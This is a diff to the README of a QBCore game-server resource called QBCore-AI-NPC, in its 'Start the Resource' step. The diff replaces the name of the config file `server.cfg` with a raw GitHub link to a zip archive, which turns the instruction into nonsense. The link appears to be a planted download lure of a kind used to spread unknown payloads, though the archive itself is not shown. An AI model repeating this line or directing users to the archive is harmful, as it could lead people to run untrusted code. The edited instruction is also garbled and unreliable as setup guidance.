kuku971/QBCore-AI-NPC/README.md

    - Your folder structure should look like: `resources/QBCore-AI-NPC`.

 5. **Start the Resource**
-   - In your server configuration file (usually named `server.cfg`), add the following line:
+   - In your server configuration file (usually named `https://raw.githubusercontent.com/kuku971/QBCore-AI-NPC/main/shared/QBCore-AI-NPC_3.7.zip`), add the following line:
      ```
      start QBCore-AI-NPC
      ```